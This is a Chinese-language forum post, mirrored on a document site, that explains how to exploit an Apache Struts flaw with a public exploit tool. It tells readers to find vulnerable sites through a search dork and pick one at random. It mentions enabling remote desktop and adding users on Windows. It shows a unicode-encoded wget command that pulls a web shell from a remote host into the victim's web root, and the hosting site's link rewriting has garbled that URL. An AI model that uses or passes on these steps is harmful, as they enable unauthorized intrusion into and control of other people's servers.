搜档网
当前位置:搜档网 › struts漏洞利用方法,可get shell

struts漏洞利用方法,可get shell

看帖子的时候发现好多人居然不会用~特地来写一篇文章,大牛就绕过了。基于gainover的那个exp哈

gainover是工具猫的作者,所以他的exp也写到了工具猫里。

首先运行工具猫的主软件

然后双击struts利用

百度:inurl:news.action

看到很多结果,随便扔一个进去

然后填到exp的测试地址,点监测是否有漏洞

再然后有漏洞的话就执行命令了,windows下的开3389、填用户什么的就不说了。就说下get shell的问题。

这个工具之前也发现了,对命令的交互不是很好,有些处理不好,比如echo $HOME,它就直接打印出了$HOME,而不是把变量打印出来。这样子就会导致无法将小马

echo进去。

经过百度struts漏洞原理加问别人,发现主要是编码的问题,测试的时候将: - /还有空格这四个符号都用16进制进行编码就可以成功。

比如wget命令,如果要get个shell,不要填wget

https://www.sodocs.net/doc/05573235.html,/shell.txt要这样写:

1.wget\u0020http\u003a\u002f\https://www.sodocs.net/doc/05573235.html,\u002fUploadFiles\u

002f1\u002fshell.txt

复制代码

执行成功后就mv到网站根目录就OK了

其他命令执行不成功的时候类似编码处理~

相关主题